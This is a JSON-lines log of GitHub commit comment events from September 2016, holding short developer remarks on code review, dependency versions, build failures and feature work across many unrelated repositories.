{"id":"4511566349","type":"CommitCommentEvent","actor":{"login":"bbockelm"},"repo":{"name":"bbockelm/root"},"payload":{"comment":{"id":18888719,"position":54,"line":99,"path":"tree/tree/inc/TTreeCache.h","commit_id":"9ec05ff059ce165a34f898eae2cb1f571df794ef","created_at":"2016-09-03T03:58:48Z","updated_at":"2016-09-03T03:58:48Z","body":"Alright, the refactor of this is too much for tonight ... will try to tackle it later this weekend."}},"created_at":"2016-09-03T03:58:48Z"}
{"id":"4511567039","type":"CommitCommentEvent","actor":{"login":"lulbehanger777"},"repo":{"name":"lulbehanger777/lulbehang778"},"payload":{"comment":{"id":18888720,"position":null,"line":null,"path":null,"commit_id":"3055041aed672e9685d6a4e0a42b32d2860e14d5","created_at":"2016-09-03T03:59:35Z","updated_at":"2016-09-03T03:59:35Z","body":"3055041"}},"created_at":"2016-09-03T03:59:35Z"}
{"id":"4511567108","type":"CommitCommentEvent","actor":{"login":"sanand0"},"repo":{"name":"gramener/autolysis"},"payload":{"comment":{"id":18888721,"position":null,"line":null,"path":null,"commit_id":"8e7f2ac3df38028a1f8dcb3a671cd9eb9ed5c26c","created_at":"2016-09-03T03:59:38Z","updated_at":"2016-09-03T03:59:38Z","body":"This appears to be an `odo` bug Kathir. Let's discuss how we address it. Ignoring MySQL may be the right thing to do, but let's do that only on travis, i.e. in `.travis.yml` rather than in the test case."}},"created_at":"2016-09-03T03:59:38Z"}
{"id":"4511569315","type":"CommitCommentEvent","actor":{"login":"DrCelt"},"repo":{"name":"chowdermcarthor/bunkerstation"},"payload":{"comment":{"id":18888726,"position":11,"line":1709,"path":"code/modules/mob/living/carbon/human/human.dm","commit_id":"d83b530588171701596a4ae6b9d931b9c9d83f43","created_at":"2016-09-03T04:01:19Z","updated_at":"2016-09-03T04:01:19Z","body":"gender == FEMALE"}},"created_at":"2016-09-03T04:01:19Z"}
{"id":"4511569424","type":"CommitCommentEvent","actor":{"login":"Becold"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18888727,"position":4,"line":7,"path":"cfg.js.example","commit_id":"75557ea2a44ed9847cc9b54de4cf8843e4b6a3ea","created_at":"2016-09-03T04:01:28Z","updated_at":"2016-09-03T04:01:28Z","body":"Maybe to check if the server is up-to-date."}},"created_at":"2016-09-03T04:01:28Z"}
{"id":"4511570623","type":"CommitCommentEvent","actor":{"login":"juanarbelaez"},"repo":{"name":"afelo21/pruebaSW3"},"payload":{"comment":{"id":18888728,"position":null,"line":null,"path":null,"commit_id":"cb44179b19f5beccfb0ebb7c16e0ef0bf7c1528d","created_at":"2016-09-03T04:02:35Z","updated_at":"2016-09-03T04:02:35Z","body":"Archivo README editado, prueba de colaborador\r\n"}},"created_at":"2016-09-03T04:02:35Z"}
{"id":"4511571170","type":"CommitCommentEvent","actor":{"login":"semipermeable"},"repo":{"name":"solanolabs/tddium"},"payload":{"comment":{"id":18888729,"position":null,"line":null,"path":null,"commit_id":"47134057d3aa01e531dd929c9f20a3e9b3eae9d9","created_at":"2016-09-03T04:03:03Z","updated_at":"2016-09-03T04:03:03Z","body":"Thanks for the note.  You should probably be referencing the solanolabs/solano gem instead of this gem here.  We've deprecated solanolabs/tddium in favor of solanolabs/solano, which continues to be under active development.\r\n\r\nWhat did you have in mind regarding extracting \"this\"?  Do you mean removing the dependency on the `github_api` gem?  If that simplifies dependency management overall, it's likely we can split it out."}},"created_at":"2016-09-03T04:03:03Z"}
{"id":"4511572733","type":"CommitCommentEvent","actor":{"login":"fanbo1101020133"},"repo":{"name":"fanbo1101020133/-"},"payload":{"comment":{"id":18888731,"position":null,"line":null,"path":null,"commit_id":"30f05cb8c140e7fd7dcc982b4ba914267ca0a173","created_at":"2016-09-03T04:04:12Z","updated_at":"2016-09-03T04:04:12Z","body":"金范思"}},"created_at":"2016-09-03T04:04:12Z"}
{"id":"4511574601","type":"CommitCommentEvent","actor":{"login":"skathirmani"},"repo":{"name":"gramener/autolysis"},"payload":{"comment":{"id":18888734,"position":null,"line":null,"path":null,"commit_id":"8e7f2ac3df38028a1f8dcb3a671cd9eb9ed5c26c","created_at":"2016-09-03T04:05:57Z","updated_at":"2016-09-03T04:05:57Z","body":"sure @sanand0. MySQL test cases are working fine in my machine. Maybe we could restrict the `odo`, `blaze` etc., versions till we identify or fix the issue?  "}},"created_at":"2016-09-03T04:05:57Z"}
{"id":"4511576506","type":"CommitCommentEvent","actor":{"login":"juanarbelaez"},"repo":{"name":"afelo21/pruebaSW3"},"payload":{"comment":{"id":18888738,"position":null,"line":null,"path":null,"commit_id":"463c622fe3cbbd9301b655a3bb1561a69679a8bb","created_at":"2016-09-03T04:07:56Z","updated_at":"2016-09-03T04:07:56Z","body":"Prueba de borrado"}},"created_at":"2016-09-03T04:07:56Z"}
{"id":"4511577669","type":"CommitCommentEvent","actor":{"login":"lastavenger"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":18888741,"position":4,"line":37,"path":"nvchecker.ini","commit_id":"f156f08e56ebe4d1d17a6fcf472e4db4d0b85c0f","created_at":"2016-09-03T04:09:17Z","updated_at":"2016-09-03T04:09:17Z","body":"崔土豪这是写错了？"}},"created_at":"2016-09-03T04:09:17Z"}
{"id":"4511578366","type":"CommitCommentEvent","actor":{"login":"lulbehanger777"},"repo":{"name":"lulbehanger777/Als-niets-helpt-doe-niets-"},"payload":{"comment":{"id":18888743,"position":1,"line":1,"path":"README.md","commit_id":"f04ebf2bedda66994847026a1a1076f37b41507c","created_at":"2016-09-03T04:09:58Z","updated_at":"2016-09-03T04:09:58Z","body":"Als-niets-helpt-doe-niets-"}},"created_at":"2016-09-03T04:09:58Z"}
{"id":"4511581785","type":"CommitCommentEvent","actor":{"login":"Marusya82"},"repo":{"name":"codepath-project-stories/timeline"},"payload":{"comment":{"id":18888746,"position":null,"line":null,"path":null,"commit_id":"d8078d2ab45fa2c4d43b9b82f69cc8529646a4c0","created_at":"2016-09-03T04:13:21Z","updated_at":"2016-09-03T04:13:21Z","body":"What was wrong with it? Did it overlap other views? I kinda like it a little bigger than it is now.."}},"created_at":"2016-09-03T04:13:21Z"}
{"id":"4511583926","type":"CommitCommentEvent","actor":{"login":"sanand0"},"repo":{"name":"gramener/autolysis"},"payload":{"comment":{"id":18888748,"position":null,"line":null,"path":null,"commit_id":"8e7f2ac3df38028a1f8dcb3a671cd9eb9ed5c26c","created_at":"2016-09-03T04:15:40Z","updated_at":"2016-09-03T04:15:40Z","body":"Yes. [blaze 0.9.1 + odo 0.4.2 is working](https://travis-ci.org/gramener/autolysis/jobs/125332549) and [blaze 0.10.1 + odo 0.5.0 is not](https://travis-ci.org/gramener/autolysis/jobs/125332550). Let's freeze those versions please @skathirmani "}},"created_at":"2016-09-03T04:15:40Z"}
{"id":"4511584929","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18888749,"position":null,"line":null,"path":null,"commit_id":"ea8208c8ea1521fec466987d3eda76ab5e3a8f11","created_at":"2016-09-03T04:16:45Z","updated_at":"2016-09-03T04:16:45Z","body":"Switch to Split view and uncheck Show notes for a brief overview"}},"created_at":"2016-09-03T04:16:45Z"}
{"id":"4511585635","type":"CommitCommentEvent","actor":{"login":"atamariya"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18888751,"position":null,"line":null,"path":null,"commit_id":"7eb91c6290cf6f6b0d84c8e8a55d92d6fc650549","created_at":"2016-09-03T04:17:30Z","updated_at":"2016-09-03T04:17:30Z","body":"@SubJunk When you exaggerate it with numbers, it does seem horrible. But it has to be noted that not all codecs are same. http://bernholdtech.blogspot.in/2013/03/Nine-different-audio-encoders-100-pass-recompression-test.html\r\nSome perform well even at 96kbps.\r\n![9kkbps](https://cloud.githubusercontent.com/assets/7592594/18222592/e59b9aa8-71b9-11e6-856f-83447f53bbea.png)\r\n\r\nSome perform bad even at 256kbps.\r\n![256kbps](https://cloud.githubusercontent.com/assets/7592594/18222596/00327918-71ba-11e6-9f07-60052f60a50c.png)\r\n\r\nEven if it is (or it's not) improving anything, the downside always remain viz:\r\n- Excessive CPU usage\r\n- Longer transcoding time\r\n- Affects the video quality since there's less room for video\r\n\r\n> \r\n    -maxrate <int> E..VA. Set maximum bitrate tolerance (in bits/s). Requires bufsize to be set. (from INT_MIN to INT_MAX)\r\n    -bufsize <int> E..VA. set ratecontrol buffer size (in bits) (from INT_MIN to INT_MAX)\r\n\r\nIMHO, if it must remain, there must be an added flag to turn it off.\r\n"}},"created_at":"2016-09-03T04:17:30Z"}
{"id":"4511586338","type":"CommitCommentEvent","actor":{"login":"Kafley"},"repo":{"name":"Kafley/Thakur"},"payload":{"comment":{"id":18888752,"position":null,"line":null,"path":null,"commit_id":"e2090a6239e7378d8d55685136fe75e02ad7c5ba","created_at":"2016-09-03T04:18:14Z","updated_at":"2016-09-03T04:18:14Z","body":"![01ad672d0dbef834eebb40bf2cc0c6e6f057f125ee](https://cloud.githubusercontent.com/assets/21272329/18222650/e16599e6-716b-11e6-8d00-4d42bace0520.jpg)\r\n"}},"created_at":"2016-09-03T04:18:14Z"}
{"id":"4511588915","type":"CommitCommentEvent","actor":{"login":"leanderson41"},"repo":{"name":"facebook/osquery"},"payload":{"comment":{"id":18888755,"position":null,"line":null,"path":null,"commit_id":"35c6cb8f39a097ada5bea7850f6671b234e8906a","created_at":"2016-09-03T04:20:51Z","updated_at":"2016-09-03T04:20:51Z","body":"Help"}},"created_at":"2016-09-03T04:20:51Z"}
{"id":"4511589398","type":"CommitCommentEvent","actor":{"login":"markwal"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":18888757,"position":27,"line":112,"path":"src/utils/SparseLineGrid.h","commit_id":"3a06f49fba3c800ae9ef80e49e6e9acf50d4e561","created_at":"2016-09-03T04:21:19Z","updated_at":"2016-09-03T04:21:19Z","body":"I think you're right, there a few places here where this code assumes the truncation always goes to the grid coordinate less than the passed in coordinate, but in the negative coordinate space, the grid coordinate will be greater than (closer to 0) the passed in coordinate.\r\n\r\nHowever, I believe there is also a problem even in the all positive coordinate space for negative slope lines (y_dir == -1).\r\n\r\nAn interesting case is the last row (cell_y == end_cell_y).  For y_dir == 1, nearest_next_y > toLowerCoord(end_cell_y) and nearest_next_y > end.Y, so corresponding_x >= end.X and therefore (for all X >= 0) x_cell_end >= end_cell.X and we'll hit the terminating condition (grid_loc == end_cell).\r\n\r\nHowever, for y_dir == -1, nearest_next_y <= end.Y for cell_y == end_cell.Y (ie may be less than end.Y) and therefore corresponding_x < end.X and x_cell_end may be < end_cell.X and if so the terminating condition will never be reached.\r\n\r\nFor example a negative slope line that crosses 4 rows but 8 columns in the grid.  The nearest_next_y, will be 3/4 the way to the end (nearest_next_y - start.Y) / y_diff, but corresponding_x will only be 6 columns over rather than the intended 7. (3/4 of 8 is 6)."}},"created_at":"2016-09-03T04:21:19Z"}
{"id":"4511589407","type":"CommitCommentEvent","actor":{"login":"leanderson41"},"repo":{"name":"facebook/osquery"},"payload":{"comment":{"id":18888758,"position":null,"line":null,"path":null,"commit_id":"35c6cb8f39a097ada5bea7850f6671b234e8906a","created_at":"2016-09-03T04:21:20Z","updated_at":"2016-09-03T04:21:20Z","body":"Help"}},"created_at":"2016-09-03T04:21:20Z"}
{"id":"4511590453","type":"CommitCommentEvent","actor":{"login":"Autotonic"},"repo":{"name":"Autotonic/piny-librtmp"},"payload":{"comment":{"id":18888759,"position":null,"line":null,"path":null,"commit_id":"21cae080a98d85f7c9943cbccf0189afd409cb56","created_at":"2016-09-03T04:22:33Z","updated_at":"2016-09-03T04:22:33Z","body":"This method loads librtmp library correctly with Python3. _librtmp.dll and _librtmp.pyd removed for now.  Support for Python2 and Python3 under Linux are priority, Windows will most likely require some wrapper functions to load the _librtmp.dll instead of _librtmp.so."}},"created_at":"2016-09-03T04:22:33Z"}
{"id":"4511592480","type":"CommitCommentEvent","actor":{"login":"bimalkjha"},"repo":{"name":"ibmdb/node-ibm_db"},"payload":{"comment":{"id":18888762,"position":null,"line":null,"path":null,"commit_id":"d5fc49a15b6864b8b454fa7720294a93b8e0b924","created_at":"2016-09-03T04:24:51Z","updated_at":"2016-09-03T04:24:51Z","body":"This fix is not released and is under testing. Once released then only you can get it using `npm install ibm_db`. If you want to get it now, please use this command: `pm install git+https://git@github.com/ibmdb/node-ibm_db.git`  . Thanks."}},"created_at":"2016-09-03T04:24:51Z"}
{"id":"4511593301","type":"CommitCommentEvent","actor":{"login":"Ahrovan"},"repo":{"name":"mavlink/mavlink"},"payload":{"comment":{"id":18888763,"position":null,"line":null,"path":null,"commit_id":"8201e5fa8d7e9389720499630601ba8e4468204d","created_at":"2016-09-03T04:25:43Z","updated_at":"2016-09-03T04:25:43Z","body":"So what is in the file common.xml is owned by px4"}},"created_at":"2016-09-03T04:25:43Z"}
{"id":"4511594291","type":"CommitCommentEvent","actor":{"login":"marinba"},"repo":{"name":"marinba/equipo"},"payload":{"comment":{"id":18888764,"position":3,"line":3,"path":"index.html","commit_id":"ceec60f4e7edb80569ffd7eb1b57e6184247f600","created_at":"2016-09-03T04:26:46Z","updated_at":"2016-09-03T04:26:46Z","body":"<link rel=\"stylesheet\" href=\"estilo.css\">"}},"created_at":"2016-09-03T04:26:46Z"}
{"id":"4511594573","type":"CommitCommentEvent","actor":{"login":"marinba"},"repo":{"name":"marinba/equipo"},"payload":{"comment":{"id":18888765,"position":null,"line":null,"path":null,"commit_id":"ceec60f4e7edb80569ffd7eb1b57e6184247f600","created_at":"2016-09-03T04:27:07Z","updated_at":"2016-09-03T04:27:07Z","body":"<link rel=\"stylesheet\" href=\"estilo.css\">"}},"created_at":"2016-09-03T04:27:07Z"}
{"id":"4511597809","type":"CommitCommentEvent","actor":{"login":"Vennn"},"repo":{"name":"Vennn/hello-world"},"payload":{"comment":{"id":18888768,"position":null,"line":null,"path":null,"commit_id":"7a64a588367d3c729052c2accdfd1e99cdc21d93","created_at":"2016-09-03T04:30:34Z","updated_at":"2016-09-03T04:30:34Z","body":"Awesome"}},"created_at":"2016-09-03T04:30:34Z"}
{"id":"4511599247","type":"CommitCommentEvent","actor":{"login":"DREAMWORLDVOID"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18888770,"position":null,"line":null,"path":null,"commit_id":"be5721d4dbc3def77a7e28e5d2d5b2de1805d45f","created_at":"2016-09-03T04:32:02Z","updated_at":"2016-09-03T04:32:02Z","body":"@NPCTheSBest 结构还没有完全确定，ref还在编写"}},"created_at":"2016-09-03T04:32:02Z"}
{"id":"4511599335","type":"CommitCommentEvent","actor":{"login":"markwal"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":18888771,"position":27,"line":112,"path":"src/utils/SparseLineGrid.h","commit_id":"3a06f49fba3c800ae9ef80e49e6e9acf50d4e561","created_at":"2016-09-03T04:32:09Z","updated_at":"2016-09-03T04:32:09Z","body":"I'm sorry, I don't know enough about how this function is used, but at first blush it appears to be trying to call m_grid.emplace on every grid_loc corresponding to a cell that contains the m_locator(elem) line.  Is it intentional then that x_cell_start is the same for every row?  Since we're willing to terminate early on the inner loop (x_cell_end ~ corresponding_x), should we also be willing to start on a later cell that might contain the line?\r\n\r\nPerhaps Bresenham's line algorithm would be useful here?"}},"created_at":"2016-09-03T04:32:09Z"}
{"id":"4511600215","type":"CommitCommentEvent","actor":{"login":"GoogleFrog"},"repo":{"name":"Spring-Chobby/Chobby"},"payload":{"comment":{"id":18888772,"position":null,"line":null,"path":null,"commit_id":"5b0e2f0f88c1a7c4abb5a6ccab817a53864f5cdf","created_at":"2016-09-03T04:33:06Z","updated_at":"2016-09-03T04:33:06Z","body":"This doesn't do anything because the change was copied to the wrong place."}},"created_at":"2016-09-03T04:33:06Z"}
{"id":"4511604479","type":"CommitCommentEvent","actor":{"login":"markwal"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":18888777,"position":27,"line":112,"path":"src/utils/SparseLineGrid.h","commit_id":"3a06f49fba3c800ae9ef80e49e6e9acf50d4e561","created_at":"2016-09-03T04:37:47Z","updated_at":"2016-09-03T04:37:47Z","body":"It's already close to Bresenham's algorithm, but it doesn't do the octant transform in order to guarantee that the grid step rate X <= step rate Y (1)."}},"created_at":"2016-09-03T04:37:47Z"}
{"id":"4511607492","type":"CommitCommentEvent","actor":{"login":"vik-y"},"repo":{"name":"shreyakupadhyay/network-stat"},"payload":{"comment":{"id":18888779,"position":1,"line":1,"path":"updated_get_mac.py","commit_id":"10a53146f3b213c2173f4e5d91705430e38833c8","created_at":"2016-09-03T04:40:57Z","updated_at":"2016-09-03T04:40:57Z","body":"Why did you create a new file? It's not required. \r\n\r\nDon't use subprocess to get the output. Use os.popen() call as used in the functions in file util.py "}},"created_at":"2016-09-03T04:40:57Z"}
{"id":"4511608482","type":"CommitCommentEvent","actor":{"login":"vik-y"},"repo":{"name":"shreyakupadhyay/network-stat"},"payload":{"comment":{"id":18888780,"position":2,"line":2,"path":"updated_get_mac.py","commit_id":"10a53146f3b213c2173f4e5d91705430e38833c8","created_at":"2016-09-03T04:42:01Z","updated_at":"2016-09-03T04:42:01Z","body":"Anyway Aditya has implemented getMac function already. "}},"created_at":"2016-09-03T04:42:01Z"}
{"id":"4511608539","type":"CommitCommentEvent","actor":{"login":"fitzyjoe"},"repo":{"name":"TeslaGov/joan"},"payload":{"comment":{"id":18888781,"position":16,"line":16,"path":"rampart-joan-hook/src/main/java/com/teslagov/joan/rampart/JoanRampartHook.java","commit_id":"237adfb4147508a55bfedb2db44022410d964dc7","created_at":"2016-09-03T04:42:04Z","updated_at":"2016-09-03T04:42:04Z","body":"How about we use the hex version of the binary(16)?   (another way of\nsaying the String of the UUID without hyphens)\n\nOn Fri, Sep 2, 2016 at 6:08 PM, Kevin Chen <notifications@github.com> wrote:\n\n> @fitzyjoe <https://github.com/fitzyjoe> We will need an intermediate\n> service that maps Rampart IDs (UUIDs) to Arc IDs (strings).\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/TeslaGov/joan/commit/237adfb4147508a55bfedb2db44022410d964dc7#commitcomment-18887384>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AF68mlnGfNOjZlFWKsNSLO09fdyoVhbkks5qmJ5BgaJpZM4J0IBN>\n> .\n>\n"}},"created_at":"2016-09-03T04:42:04Z"}
{"id":"4511608956","type":"CommitCommentEvent","actor":{"login":"euwbah"},"repo":{"name":"samaaron/sonic-pi"},"payload":{"comment":{"id":18888782,"position":null,"line":null,"path":null,"commit_id":"33c929ccde52f3854450e85c628c53e2c5a3f139","created_at":"2016-09-03T04:42:30Z","updated_at":"2016-09-03T04:42:30Z","body":"Hi! I've been trying to use this new feature, but when using the new /save-and-run-buffer-via-local-file OSC message, I still can't seem to run large files. I'm not too sure what those parameters mean, but I tried to guess from the code and this is what I was sending:\r\n`/save-and-run-buffer-via-local-file SONIC-PI-CLI <buffer number> <file path> eval`\r\nDid I do anything wrong there? Or must I open sonic pi in TCP mode?"}},"created_at":"2016-09-03T04:42:30Z"}
{"id":"4511611219","type":"CommitCommentEvent","actor":{"login":"MrGenga"},"repo":{"name":"PrismarineMC/Prismarine"},"payload":{"comment":{"id":18888786,"position":null,"line":null,"path":null,"commit_id":"a5132e7a27785aa5b930fe6d8191543de4749205","created_at":"2016-09-03T04:44:47Z","updated_at":"2016-09-03T04:44:47Z","body":"F**k you. You broken compatible with Genisys, idiot"}},"created_at":"2016-09-03T04:44:47Z"}
{"id":"4511612106","type":"CommitCommentEvent","actor":{"login":"Janly238"},"repo":{"name":"Janly238/Link-predicition"},"payload":{"comment":{"id":18888788,"position":null,"line":null,"path":null,"commit_id":"dbf2671ebe4ede817a1b2b4ec1309a011b45e995","created_at":"2016-09-03T04:45:47Z","updated_at":"2016-09-03T04:45:47Z","body":"官方相似性算法通过本人AUC程序测试，增加Ep测试集,Et训练集,M无连边的点的集合,Ep的label标为2，Et标为1，M标为0."}},"created_at":"2016-09-03T04:45:47Z"}
{"id":"4511612112","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18888789,"position":null,"line":null,"path":null,"commit_id":"79a12ca873918623db0c3cf60dad0340cffd8b70","created_at":"2016-09-03T04:45:48Z","updated_at":"2016-09-03T04:45:48Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - Win64-Windows-7-VisualStudio-12: Tests Failed (1760 of 2333 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79a12ca873918623db0c3cf60dad0340cffd8b70-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79a12ca873918623db0c3cf60dad0340cffd8b70-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.44%25-red.svg)</a> \n"}},"created_at":"2016-09-03T04:45:48Z"}
{"id":"4511612341","type":"CommitCommentEvent","actor":{"login":"marinba"},"repo":{"name":"marinba/equipo"},"payload":{"comment":{"id":18888790,"position":null,"line":null,"path":null,"commit_id":"c92ccf3cab631cec6fc638454da7bc92ad5cfd92","created_at":"2016-09-03T04:46:02Z","updated_at":"2016-09-03T04:46:02Z","body":"lalalala"}},"created_at":"2016-09-03T04:46:02Z"}
{"id":"4511612589","type":"CommitCommentEvent","actor":{"login":"bradgessler"},"repo":{"name":"polleverywhere/quebert"},"payload":{"comment":{"id":18888791,"position":null,"line":null,"path":null,"commit_id":"7dab94ab95a3d87de87d7e8675f5704079bf2618","created_at":"2016-09-03T04:46:19Z","updated_at":"2016-09-03T04:46:19Z","body":"Ruby 2.0.0 dies in Travis CI https://travis-ci.org/polleverywhere/quebert/builds/156368634\r\n\r\nYou can just drop support for 2.0.0 and add to the README that only versions of MRI that are official supported are supported by Quebert (2.1, which is gone soon, 2.2 and 2.3)"}},"created_at":"2016-09-03T04:46:19Z"}
{"id":"4511615523","type":"CommitCommentEvent","actor":{"login":"bkaradzic"},"repo":{"name":"elmindreda/bgfx"},"payload":{"comment":{"id":18888795,"position":null,"line":null,"path":null,"commit_id":"c6b41fa915742695b0ac615a8b4de14a6795edd1","created_at":"2016-09-03T04:49:22Z","updated_at":"2016-09-03T04:49:22Z","body":":+1: "}},"created_at":"2016-09-03T04:49:22Z"}
{"id":"4511620332","type":"CommitCommentEvent","actor":{"login":"lzybkr"},"repo":{"name":"PowerShell/PowerShell"},"payload":{"comment":{"id":18888804,"position":null,"line":null,"path":null,"commit_id":"0bad74b790b85098a7b4575147cd6ae0ab010e12","created_at":"2016-09-03T04:54:09Z","updated_at":"2016-09-03T04:54:09Z","body":"Yes, exactly - generate a file with the line endings we want to test."}},"created_at":"2016-09-03T04:54:09Z"}
{"id":"4511620605","type":"CommitCommentEvent","actor":{"login":"hiddentao"},"repo":{"name":"hiddentao/fast-levenshtein"},"payload":{"comment":{"id":18888805,"position":null,"line":null,"path":null,"commit_id":"80874a9c0cd8d9f5aee9d73aa39d9ab0a9d51435","created_at":"2016-09-03T04:54:30Z","updated_at":"2016-09-03T04:54:30Z","body":"Done!\n\n-- \nRamesh Nair\n\nDirector\nHiddenTao Ltd (UK company no. 6807289)\n\nhttp://hiddentao.com\nhttps://github.com/hiddentao\nhttps://www.linkedin.com/in/hiddentao\n\n\nOn 3 September 2016 at 01:55:20, Brian Donovan (notifications@github.com) wrote:\n\nThis was never tagged, so tools like bower cannot find v1.1.4. Mind adding a tag for it?\n\n—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub, or mute the thread.\n\n"}},"created_at":"2016-09-03T04:54:30Z"}
{"id":"4511621890","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":18888806,"position":null,"line":null,"path":null,"commit_id":"37668908f9234db55ff04fb22e3d17b8c7114488","created_at":"2016-09-03T04:55:49Z","updated_at":"2016-09-03T04:55:49Z","body":"Just checked out the demo and wow, Ray, you simply don't give yourself enough credit. I'm gonna try to pull out your login screen work into a separate pull request and I expect the community will simply fall in love with it (I will to add some logo options for folks that add their own logos and plan to make the \"OpenEMR\" text also an option; by default will just show the main logo).\r\n\r\nAnd the menu, again, just another huge wow. Appears this is still a work in progress, so will wait for you to continue to work your magic."}},"created_at":"2016-09-03T04:55:49Z"}
{"id":"4511622151","type":"CommitCommentEvent","actor":{"login":"tonytheodore"},"repo":{"name":"mxe/mxe"},"payload":{"comment":{"id":18888808,"position":null,"line":null,"path":null,"commit_id":"3d44ee628ff5cdd1aa91ef6bf0bff86ee1e69420","created_at":"2016-09-03T04:56:07Z","updated_at":"2016-09-03T04:56:07Z","body":"Thanks"}},"created_at":"2016-09-03T04:56:07Z"}
{"id":"4511623532","type":"CommitCommentEvent","actor":{"login":"fpletz"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18888810,"position":null,"line":null,"path":null,"commit_id":"5ce6cd0106242648ccc9e7ea64716a866eca152c","created_at":"2016-09-03T04:57:38Z","updated_at":"2016-09-03T04:57:38Z","body":"The evaluation is still failing because `ghcjs` passes the self attribute to `nodePackages`. Not sure what to do here.\r\n\r\nSee https://travis-ci.org/NixOS/nixpkgs/jobs/157261313 and https://github.com/NixOS/nixpkgs/blob/5ce6cd0106242648ccc9e7ea64716a866eca152c/pkgs/development/compilers/ghcjs/default.nix#L133"}},"created_at":"2016-09-03T04:57:38Z"}
{"id":"4511624368","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18888811,"position":null,"line":null,"path":null,"commit_id":"f5c93871f4e329c64d6e2f25c318755d7286b7be","created_at":"2016-09-03T04:58:30Z","updated_at":"2016-09-03T04:58:30Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#M921xWrySjihrvgYj4JhQA"}},"created_at":"2016-09-03T04:58:30Z"}
{"id":"4511627219","type":"CommitCommentEvent","actor":{"login":"fidele007"},"repo":{"name":"fidele007/khmer-smarter-keyboard"},"payload":{"comment":{"id":18888813,"position":null,"line":null,"path":null,"commit_id":"8839bb31e0e7219206bd41d94958f78cdf5c2ce1","created_at":"2016-09-03T05:01:18Z","updated_at":"2016-09-03T05:01:18Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;Ltx6k99B&#x2F;17-feature-use-wallpaper-as-keyboard-s-background\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [Feature] Use wallpaper as keyboard&#39;s background</a>"}},"created_at":"2016-09-03T05:01:18Z"}
{"id":"4511627676","type":"CommitCommentEvent","actor":{"login":"Mr-Mason"},"repo":{"name":"Mr-Mason/article-1"},"payload":{"comment":{"id":18888814,"position":null,"line":null,"path":null,"commit_id":"f9222e631f69f906e0368d86e88f505c3c1215f0","created_at":"2016-09-03T05:01:43Z","updated_at":"2016-09-03T05:01:43Z","body":"First article by Seth and Mason. "}},"created_at":"2016-09-03T05:01:43Z"}
{"id":"4511628448","type":"CommitCommentEvent","actor":{"login":"robbee72"},"repo":{"name":"robbee72/bloc-jams-angular"},"payload":{"comment":{"id":18888815,"position":null,"line":null,"path":null,"commit_id":"9ee116a0e7b296666deeff2494358f974865f4fa","created_at":"2016-09-03T05:02:29Z","updated_at":"2016-09-03T05:02:29Z","body":"fix"}},"created_at":"2016-09-03T05:02:29Z"}
{"id":"4511629210","type":"CommitCommentEvent","actor":{"login":"Wulf"},"repo":{"name":"Thomas101/nodehun"},"payload":{"comment":{"id":18888817,"position":null,"line":null,"path":null,"commit_id":"48d2f2b0bfb33c23285317f3ef64c0d05f95fc72","created_at":"2016-09-03T05:03:22Z","updated_at":"2016-09-03T05:03:22Z","body":"WOW. So that's why it was failing to clone for me. Please PR."}},"created_at":"2016-09-03T05:03:22Z"}
{"id":"4511629870","type":"CommitCommentEvent","actor":{"login":"ibmboy19"},"repo":{"name":"tpai/docker-l1jtw-server"},"payload":{"comment":{"id":18888819,"position":null,"line":null,"path":null,"commit_id":"39d2e9c4268268268f8b9d85a6755d498155435c","created_at":"2016-09-03T05:04:07Z","updated_at":"2016-09-03T05:04:07Z","body":": )"}},"created_at":"2016-09-03T05:04:07Z"}
{"id":"4511631016","type":"CommitCommentEvent","actor":{"login":"FernetMenta"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18888820,"position":4,"line":35,"path":"xbmc/video/dialogs/GUIDialogVideoSettings.h","commit_id":"72cc33cfaa6af54c8bd0c15481fa8b172870e3c3","created_at":"2016-09-03T05:05:14Z","updated_at":"2016-09-03T05:05:14Z","body":"no globals"}},"created_at":"2016-09-03T05:05:14Z"}
{"id":"4511631536","type":"CommitCommentEvent","actor":{"login":"FernetMenta"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18888822,"position":13,"line":222,"path":"xbmc/video/windows/GUIWindowFullScreen.cpp","commit_id":"72cc33cfaa6af54c8bd0c15481fa8b172870e3c3","created_at":"2016-09-03T05:05:49Z","updated_at":"2016-09-03T05:05:49Z","body":"that is really bad because you make a window dependent on another window."}},"created_at":"2016-09-03T05:05:49Z"}
